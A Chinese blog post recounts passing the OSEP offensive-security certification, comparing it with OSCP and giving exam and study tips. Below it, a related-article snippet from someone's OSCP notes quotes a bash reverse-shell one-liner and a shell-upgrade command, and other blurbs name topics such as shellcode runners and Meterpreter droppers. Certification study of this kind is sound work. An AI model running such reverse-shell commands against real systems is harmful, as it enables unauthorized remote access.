OSEP 考试总结

已于 2022-11-27 15:45:09 修改
阅读量2.6k 收藏 7
点赞数 7
分类专栏: 网络安全 证书 文章标签: OSEP
于 2022-09-13 23:20:48 首次发布
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/heisejiuhuche/article/details/126843047
版权

背景

9月4日,我完成了 OSEP 的考试并顺利通过。

OSEP,即 Offensive Security Experienced Penetration Testers。

该证书的内容涉及 Windows Defender,AppLocker,AMSI,CLM,network filter 等防护机制的绕过,更加接近真实环境。

写在最前:欢迎大家来我的 Discord 频道 Northern Bay。邀请链接在这里:https://discord.gg/9XvvuFq9Wb
一起进步,一起 NB~

与 OSCP 的比较

比较一下 OSEP 和 OSCP 考试大纲。

考试时间较 OSCP 延长了 24 小时,总共 48 小时。 考试结束之后,同样有 24 小时时间完善并提交报告。

考试的工具限制较 OSCP 来说有所放松,Community 版本的工具,如 Metasploit Community, PowerShell Empire, Covenant, Bloodhound 或者 SQLmap 都是可以使用的。

但是商业工具如 Metasploit Pro, Cobalt Strike, Core Impact, or Burp Suite Pro 以及带网络欺骗的工具还是不能使用。

其他内容基本相同。

备考贴士

  1. 完成 OSCP 考试;提权的内容在 OSEP 里面不会再提及了,所以扎实的 PE 功底是拿下考试的必要条件;
  2. 一定的编程基础,可以安装环境,修改程序,debug;
  3. 推荐使用自己的 Windows 虚拟机而不是 Remote Desktop 到考试提供的测试机器;由于 VPN 网络延迟很高,使用考试提供的机器会浪费很多时间;推荐使用 CommandoVM;安装之前,先看下文档,先下载安装支持的系统如 Windows 10 1803, 1809, 1903, 1909, 2004, 20H2, or 21H1;commandoVM 考试之外也是用得上的,很多工具,非常方便;
  4. 安装 Visual Studio 2019 或者 2022,亲测最新版的 2022 考试可用,没有问题;
  5. Payload 从最简单的尝试起,而不要一开始就选择复杂度很高的代码,增加排错难度;
  6. Active Directory 仍然是重点,确保每一章节都弄懂,能熟练使用 mimikatz,Rubeus;
  7. MSSQL Server 是新的重点,应该也是必考;
  8. 完成课后 Extra Miles;
  9. 务必完成所有 Lab,最好做两遍;第二遍会有不一样的感受;
  10. 考试之前务必阅读最新的 Exam Guide;

后续

备考 OSWE。

再之后,我会学习更多关于红队和 OpSec 的内容。OpSec 是很重要的一环,就是在渗透过程中,要保持低调,不被发现。违反 OpSec 的操作,如直接大面积默认 User-Agent 的 nmap 扫描,如直接下载文件到目标机器没有做清理等,都应该重新审视。

渗透能力和保持隐匿同等重要。最近发现 ZeroPointSecurity 的红队课程(Red Team Ops I/II)挺好,在 OSWE 和 OSED 之后,会抽时间学习一下。

OSED 时间可能会灵活调整,涉及底层汇编需要更多时间去钻研,时间线会拉长。

OSWE 考试之后再来分享。

好戏才刚刚开始,一切按照计划进行。

KEEP CALM AND HACK AWAY!

0pr
关注
  • 7
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
OSEP-Pre:此存储库包含选择OSEP(逃避技术和突破性防御)认证所需的先前材料
03-03
OSEP的先验知识(指南) 这是笔记和资料的资料库,我认为这些资料和资料是我提前选择该课程和获得OSEP认证(逃避和违反防御技术)所必需的 这种材料的汇编在很大程度上受nullg0re(GIT)的影响! ######## ##### ######## ##### ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ######## ## ## ######## ## ## ### ## ## ## ## ## ## ## ##
OSEP:PEN-300OSEP PEN-300培训的公共资源
03-14
PEN-300 / OSEP PEN-300培训的公共资源。 操作系统与程序设计理论 3. Office的客户端代码执行 3.1.3.1:JavaScript 3.2.2.1:MyMarco 3.2.3.1:MyMarco和PowerShell 3.4.3.1:从VBA调用Win32 API 留言框A 查找窗口A 3.5.1.1:从PowerShell调用Win32 API 3.5.2.1:将Shellcode Runner移植到PowerShell 3.6.2.1:利用UnsafeNativeMethods 3.6.3.1:DelegateType反射 4.使用Windows脚本宿主执行客户端代码 4.1.1.1:在Jscript中创建基本的Dropper 4.1.2.1:Jscript Meterpreter滴管 (它是ServerXMLHTTP。不是XMLHT
一文带你了解OSCP 2024
白帽黑客佳哥的博客
06-16 1668
我们先说说,OSCP 是什么?OSCP (Offensive Security Certified Professional)是 Offensive Security (该公司开发和维护着 KALI Linux,以下简称 Offsec)推出的体系非常完善,对于非3年以上渗透工作经验人员来说难度非常高,理论兼实操(更重实操),是业界最知名的渗透测试专业证书。如果大家对网络、主机渗透、红队感兴趣的,这是大家的第一步。考试有三台单独考试靶机和一套域环境(三台机器)三台单独机器,每台20分;
**深入渗透测试者之路:OSEP的智慧宝库**
最新发布
gitblog_00043的博客
06-22 617
深入渗透测试者之路:OSEP的智慧宝库 项目地址:https://gitcode.com/nullg0re/Experienced-Pentester-OSEP 在浩瀚的技术海洋中探索未知的安全边界,Experienced-Pentester-OSEP无疑是一座灯塔,为所有热衷于安全研究与实践的同行提供了一条清晰的学习路径和实战指南。 项目简介 Experienced-Pentester-OSEP...
OSED 考试总结
0pr
11-15 1855
考完 OSEP 已经两个多月了,期间在准备 OSWE 和 OSED 证书的考试。OSWE 考了一次,结果被墙了,郁闷。接着就安排了 OSED 的考试。时间在双十一 😄。今天我收到了 OSED 考试通过的邮件。我一直比较喜欢底层的东西,做程序员的时候我写过一个系列,从头开始写操作系统。32位实模式转换已经写完了,隔了好久也还没有时间继续下去。等完成了手头的事情,继续写。接下去就应该是驱动了。言归正传。先介绍一下 EXP301 课程。
探索OSEP(进攻与防御技巧)——网络安全的深度指南
gitblog_00031的博客
06-18 294
探索OSEP(进攻与防御技巧)——网络安全的深度指南 项目地址:https://gitcode.com/r0r0x-xx/OSEP-Pre 在这个数字化的时代,网络安全日益重要,而OSEP(进攻与防御技巧)证书正是提升这一领域技能的关键。本开源项目提供了一套全面的学习资源,帮助你深入了解网络安全的复杂世界。 项目介绍 这个仓库是一个精心整理的知识库,特别针对那些准备参加OSEP认证考试或希望深入研...
OSEP-Thoughts:我对OSEP资料的看法
05-29
OSEP-思想 我对 OSEP 材料的看法。 OSEP PDF OSEP PDF 涵盖了大量具有惊人深度的材料。 这些技术大多可以在其他地方找到,但 OSEP 材料将它们全部汇总到一个地方,并深入解释了这些技术的工作原理。 正如您对 Offsec 所期望的那样,细节和解释的水平非常高。 提到并解释了所有流行的工具,但也编写了大量自定义代码来帮助您了解漏洞利用的工作方式。 我想说这门课程对于任何级别的渗透测试的人来说都是必备的。 带走 本课程中的所有材料都可以在其他地方获得,但这是该知识的一个核心集合,其详细程度令人惊叹。 警告 我没有做我过去做过的利用向量的实验室。 我将回过头来讨论它们,因为我想以 Offsec 描述的方式实现它们,但我对所涵盖的许多漏洞利用向量都有经验。 关于实验室和视频的进一步想法即将推出。
OSCP之旅
03-04
OSCP之旅
OSCP历程
Shadow的博客
12-08 1551
今天1点40,我收到了offensive发的邮件,通知我通过了oscp考试!现在总结下吧。 1、笔记很重要,教材一定要看,很多细节都在教材里面,遇到新知识一定要记笔记,每做一台靶机,之后一定要写报告,把你渗透的过程,思路,记录下来。因为当时你觉得可能记住了,但是做了几十台到考试前时候你发现什么都记不住,这时候就需要过一遍你的靶机writeup来回忆相关知识点。 2、官方靶机如果遇到不会的,没头绪的,可以上论坛,看看别人是怎么说的。如果一台靶机做了一天还是一点进展都没有,那就下一台吧,可能...
OSCP、OSEP、OSWE、OSED四大认证对比,看这一篇就够了!
weixin_43766412的博客
10-31 3876
OSCP、OSEP、OSWE、OSED四大认证对比
OSCP证书考试总结与终身学习 - 带你走上 OSCE3
热门推荐
0pr
08-25 1万+
终于有点时间写些东西了。这半年来一直在准备 Offensive Security 的各种考试,内容太多。直到昨天,也就是8月24日,我完成了第二轮 OSEP 的 Lab,心里踏实多了,等着9月4日考试的同时,也想做个小结,谈谈我拿 OSCP 的历程以及今后的目标。希望可以为想考取 OSCP 的同学指明一些道路。
OSeP-开源
07-01
**OSeP 开源电子投资组合详解** OSeP(开源电子投资组合)是一个由明尼苏达大学发起的Web应用程序,旨在为用户提供一个全面的平台来管理他们的个人、专业和教育经历。作为一款开源软件,OSeP的核心价值在于其开放源...
Experienced-Pentester-OSEP
03-20
经验丰富的OSEP只是存储我的一些课前研究笔记的地方。操作系统与程序设计理论 Win32 API Windows注册表与Office一起执行客户端代码分段与非分段负载滴管/舞台 HTML走私(非HTTP请求走私)使用Microsoft Office网络...
osep:OpenSpending增强建议
04-27
**OpenSpending增强建议** OpenSpending 是一个开源项目,旨在提供全球公共财政数据的可视化和分析工具。这个项目的目的是为了提升财务透明度,让公众能够更好地理解和追踪政府的开支情况。通过使用 OpenSpending,...
网络安全攻防界的OSCP、CISP-PTE、CISP-PTS、CISP-IRE、CISP-IRS
jennycisp的博客
08-10 2556
关注网络安全攻防领域的筒子们,肯定对OSCP、CISP-PTE、CISP-PTS、CISP-IRE、CISP-IRS不陌生,但是关于他们直减的区别,今儿想做个分享。
OSCP学习笔记总结(本资料禁止转载)
Shadow的博客
10-19 1万+
OSCP学习笔记 第零章实战学习 反弹shell bash -i >&/dev/tcp/192.168.1.1/4444 0>&1 切换交互式shell python -c 'import pty;pty.spawn("/bin/sh")' 查看系统型号:lab_release -a 查看系统版本:uname -a 查看目标主机网页内容:dirb http://192.168.1.1:80 查看网页漏洞:nikto -h 192.168.1.1 --useprox.
oscp学习(一)
qq_48514193的博客
02-20 1695
oscp
废物日记之新版oscp通关历程
m0_53302733的博客
07-27 2509
oscp
exam_formatter
07-10
### 回答1: exam_formatter是一个用于格式化考试试卷的工具,它可以帮助用户将考试试卷转化为规范的格式。 首先,exam_formatter提供了多种题型的支持,如选择题、填空题、简答题等。用户可以根据需要选择相应的题型,并按照指定的格式书写题目和选项。 其次,exam_formatter具有自动编号功能,能够自动为题目和选项进行编号。用户只需输入题目内容,exam_formatter会自动生成带有编号的题目。 此外,exam_formatter还提供了自定义选项功能,用户可以根据需要设置选项的格式,比如设置选项为大写字母、小写字母、数字等。 除了题目格式化外,exam_formatter还支持试卷题目的排版。用户可以设置试卷的布局、字体、边距等样式,使试卷看起来更加整齐、美观。 最后,exam_formatter还可以输出试卷为多种格式,如PDF、Word等。用户可以根据需要选择合适的输出格式,方便打印或分享给他人。 总的来说,exam_formatter是一个强大的考试试卷格式化工具,通过它可以使试卷的格式规范化、整洁化,并提高工作效率。无论是教师还是学生,都可以受益于它的使用。 ### 回答2: exam_formatter是一个用于格式化考试文本的工具。它可以将原始的考试文本转化为易于阅读和评分的格式。通过使用exam_formatter,教师可以更方便地组织考试内容,学生也可以更清楚地理解考试要求。 exam_formatter具有以下特点和功能: 1. 标题和子标题格式化:exam_formatter可以自动识别标题和子标题,并将其格式化为适当的字体、样式和标识符。这样就能够清晰地区分不同部分的考试内容。 2. 题目编号和分值:使用exam_formatter,教师可以为每个题目指定编号和分值。这样,学生在完成考试时可以方便地参照题目编号,教师也可以快速计算分数。 3. 选项和答案格式化:exam_formatter可以将选择题的选项和答案显示为清晰的列表,从而使学生更容易理解和选择正确答案。对于填空题和简答题,exam_formatter可以为学生提供足够的空间来填写答案。 4. 附加说明和指导:exam_formatter还可以为每个题目提供附加说明和指导。这些说明可以帮助学生更好地理解题目要求,提供一些解题思路和技巧。 5. 导出和打印:一旦考试文本完成格式化,教师可以选择导出为可编辑的文档格式,如Microsoft Word或PDF。这样,教师可以在需要的时候进行修改和打印。 总之,exam_formatter是一个功能强大的工具,可以大大简化教师的考试准备工作,提高学生对考试内容的理解和应对能力。它为考试文本提供了清晰、易读和便于评分的格式,为教师和学生提供了更好的考试体验。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值